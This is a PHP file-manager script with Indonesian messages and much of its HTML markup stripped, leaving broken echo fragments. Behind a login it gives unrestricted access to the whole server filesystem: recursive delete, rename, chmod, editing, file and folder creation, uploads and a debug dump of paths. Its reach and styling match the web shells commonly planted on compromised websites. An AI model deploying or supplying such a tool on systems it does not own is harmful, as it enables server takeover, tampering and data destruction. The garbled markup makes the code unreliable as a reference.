'; echo '
'; echo '

File Manager — Login

'; echo ''; echo '
'; echo '
'; exit(); } // ----------------- HELPERS ----------------- function rrmdir($dir) { if (!is_dir($dir)) { return @unlink($dir); } $items = @scandir($dir); if ($items === false) return false; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $p = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($p)) { rrmdir($p); } else { @unlink($p); } } return @rmdir($dir); } function flash($msg, $type) { if (!isset($_SESSION['flash'])) $_SESSION['flash'] = array(); $_SESSION['flash'][] = array('msg'=>$msg,'type'=>$type); } function show_flash() { if (!empty($_SESSION['flash'])) { foreach ($_SESSION['flash'] as $f) { $c = ($f['type'] == 'danger') ? 'danger' : (($f['type']=='success') ? 'success' : 'secondary'); echo "
{$f['msg']}
"; } unset($_SESSION['flash']); } } function safe_realpath($p) { // prefer realpath, but fall back to normalized path if realpath fails $r = @realpath($p); if ($r === false || $r === null) { // normalize dots and double slashes $r = preg_replace('#[/\\\\]+#', DIRECTORY_SEPARATOR, $p); } return $r; } function h($s) { return htmlspecialchars($s, ENT_QUOTES, 'UTF-8'); } // ----------------- CURRENT PATH ----------------- $requested = isset($_GET['path']) ? urldecode($_GET['path']) : getcwd(); $path = safe_realpath($requested); if ($path === false || $path === null || $path === '') $path = getcwd(); $path = rtrim($path, DIRECTORY_SEPARATOR); if ($path === '') $path = DIRECTORY_SEPARATOR; // ----------------- HANDLE POST ACTIONS ----------------- if ($_SERVER['REQUEST_METHOD'] === 'POST') { $current = isset($_POST['current_path']) ? safe_realpath(urldecode($_POST['current_path'])) : $path; if ($current === false || $current === null) $current = getcwd(); // DELETE if (isset($_POST['action_delete']) && !empty($_POST['target'])) { $target = safe_realpath(urldecode($_POST['target'])); if ($target === false) { flash("Target tidak ditemukan.", 'danger'); } else { if (is_dir($target)) { if (rrmdir($target)) flash("Folder dihapus: " . h($target), 'success'); else flash("Gagal menghapus folder: " . h($target), 'danger'); } else { if (@unlink($target)) flash("File dihapus: " . h($target), 'success'); else flash("Gagal menghapus file: " . h($target), 'danger'); } } header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current)); exit(); } // RENAME if (isset($_POST['action_rename']) && !empty($_POST['target']) && isset($_POST['new_name'])) { $target = safe_realpath(urldecode($_POST['target'])); $new_name = trim($_POST['new_name']); if ($target === false || $new_name === '') { flash("Invalid rename input.", 'danger'); } else { $dir = dirname($target); $dest = $dir . DIRECTORY_SEPARATOR . basename($new_name); if (@rename($target, $dest)) flash("Rename berhasil.", 'success'); else flash("Rename gagal.", 'danger'); } header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current)); exit(); } // CHMOD if (isset($_POST['action_chmod']) && !empty($_POST['target']) && isset($_POST['mode'])) { $target = safe_realpath(urldecode($_POST['target'])); $mode_str = trim($_POST['mode']); if ($target === false || $mode_str === '') { flash("Invalid chmod input.", 'danger'); } else { $mode = intval($mode_str, 8); if (@chmod($target, $mode)) flash("Chmod berhasil ($mode_str).", 'success'); else flash("Chmod gagal.", 'danger'); } header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current)); exit(); } // SAVE (edit file) if (isset($_POST['action_save']) && !empty($_POST['target']) && isset($_POST['file_content'])) { $target = safe_realpath(urldecode($_POST['target'])); $content = $_POST['file_content']; if ($target === false || !is_file($target)) { flash("File tidak ditemukan.", 'danger'); } else { if (@file_put_contents($target, $content) !== false) flash("File disimpan.", 'success'); else flash("Gagal menyimpan file.", 'danger'); } header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode(dirname($target))); exit(); } // CREATE FILE if (isset($_POST['action_create_file']) && isset($_POST['new_file_name'])) { $name = trim($_POST['new_file_name']); if ($name === '') { flash("Nama file kosong.", 'danger'); } else { $dest = $current . DIRECTORY_SEPARATOR . basename($name); if (file_exists($dest)) flash("File sudah ada.", 'danger'); else { if (@file_put_contents($dest, isset($_POST['new_file_content']) ? $_POST['new_file_content'] : '') !== false) flash("File dibuat: " . h($dest), 'success'); else flash("Gagal membuat file.", 'danger'); } } header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current)); exit(); } // CREATE FOLDER if (isset($_POST['action_create_folder']) && isset($_POST['new_folder_name'])) { $name = trim($_POST['new_folder_name']); if ($name === '') { flash("Nama folder kosong.", 'danger'); } else { $dest = $current . DIRECTORY_SEPARATOR . basename($name); if (file_exists($dest)) flash("Folder sudah ada.", 'danger'); else { if (@mkdir($dest, 0755, true)) flash("Folder dibuat: " . h($dest), 'success'); else flash("Gagal membuat folder.", 'danger'); } } header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current)); exit(); } // UPLOAD if (isset($_FILES['upload_file']) && isset($_POST['current_path'])) { $current = safe_realpath(urldecode($_POST['current_path'])); if ($current === false) $current = getcwd(); if (isset($_FILES['upload_file']['name']) && $_FILES['upload_file']['name'] !== '') { $filename = preg_replace('/[^a-zA-Z0-9\-_.]/', '_', basename($_FILES['upload_file']['name'])); $target = $current . DIRECTORY_SEPARATOR . $filename; if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) flash("File uploaded: " . h($target), 'success'); else flash("Upload failed.", 'danger'); } else { flash("No file selected.", 'danger'); } header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($current)); exit(); } } // ----------------- READ DIRECTORY ----------------- $items = @scandir($path); if ($items === false) $items = array(); ?> File Manager — Full Actions (Compat)

🔥 File Manager — Compat

Current Path:
⬅ Up Go to CWD
Create File
Create Folder
'; } else { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $full = $path . DIRECTORY_SEPARATOR . $item; $real = safe_realpath($full); $is_dir = is_dir($real); $size = $is_dir ? '-' : (is_file($real) ? filesize($real) : '-'); $perm = @fileperms($real); $permstr = $perm ? substr(sprintf('%o', $perm), -4) : '----'; $modified = @filemtime($real) ? date('Y-m-d H:i:s', filemtime($real)) : '-'; $encoded = urlencode($real); echo ''; echo ''; echo ''; echo ''; } } ?>
NameInfoActions
Empty or cannot read directory
'; echo '
'; if ($is_dir) { echo '📁 ' . h($item) . ''; } else { echo '📄 ' . h($item) . ''; } echo '
' . h($real) . '
'; echo '
' . ($is_dir ? 'DIR' : 'FILE') . '
'; echo '
' . h($permstr) . ' • ' . ($size==='-'?'-':number_format($size)) . ' B
'; echo '
' . h($modified) . '
'; echo '
'; if (!$is_dir) { echo 'Edit'; } else { echo 'Open'; } echo ''; echo ''; echo '
'; echo ''; echo ''; echo ''; echo '
'; echo '
'; // rename form echo ''; // chmod form echo ''; echo '
'; echo '
Editing: ' . h($edit_target) . '
'; echo '
Back
'; echo '
'; echo '
'; echo ''; echo ''; echo ''; echo '
'; echo '
'; } else { echo '
Cannot open file for editing.
'; } } ?>
Tip: This interface performs real filesystem operations. Be careful.
DEBUG:
cwd: 

requested: 

resolved path: